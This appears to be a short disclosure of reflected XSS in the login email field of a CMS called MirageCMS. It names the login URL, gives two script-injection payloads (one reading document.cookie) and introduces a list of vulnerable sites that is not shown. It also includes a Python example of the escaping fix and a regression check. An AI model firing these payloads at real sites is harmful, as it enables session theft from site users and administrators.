Overview - All versions of MirageCMS are vulnerable to reflected XSS. An attacker can inject JavaScript into the email parameter on the login page. More than 28 websites are vulnerable.
POC - www.miragecms.com/admin/login
"><script>alert(1);</script>
"><script>alert(document.cookie);</script>
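Why the leading "> matters, and what fixes it, shown as an added example that is not MirageCMS code. The form template and function names are constructed assumptions, since the CMS's own template is not shown on this page. The check parses the rendered page and confirms the email field is the only place the input ends up.

```python
import html
from html.parser import HTMLParser

# Constructed model of a login form that echoes the submitted email back
# into the value attribute (assumption: the CMS template is not shown here).
FORM = '<form method="post"><input type="text" name="email" value="{email}"></form>'


def render_vulnerable(email: str) -> str:
    # Raw reflection: a double quote in the input ends the attribute early.
    return FORM.format(email=email)


def render_hardened(email: str) -> str:
    # Encode &, <, >, " and ' so the input can only ever be attribute data.
    return FORM.format(email=html.escape(email, quote=True))


class _Audit(HTMLParser):
    """Records every start tag and the decoded value of the email field."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.email_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "email":
            self.email_value = attrs.get("value")


def reflection_is_safe(rendered: str, submitted: str) -> bool:
    # Safe: only the template's own tags exist, and the field's decoded
    # value is exactly what was submitted (nothing escaped the attribute).
    audit = _Audit()
    audit.feed(rendered)
    audit.close()
    return audit.tags == ["form", "input"] and audit.email_value == submitted


PAYLOAD = '"><script>alert(1);</script>'  # first PoC string from this page

if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        print(render.__name__, reflection_is_safe(render(PAYLOAD), PAYLOAD))
```

The same check can be kept as a regression test for any template that echoes request parameters into attributes.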
All the vulnerable websites: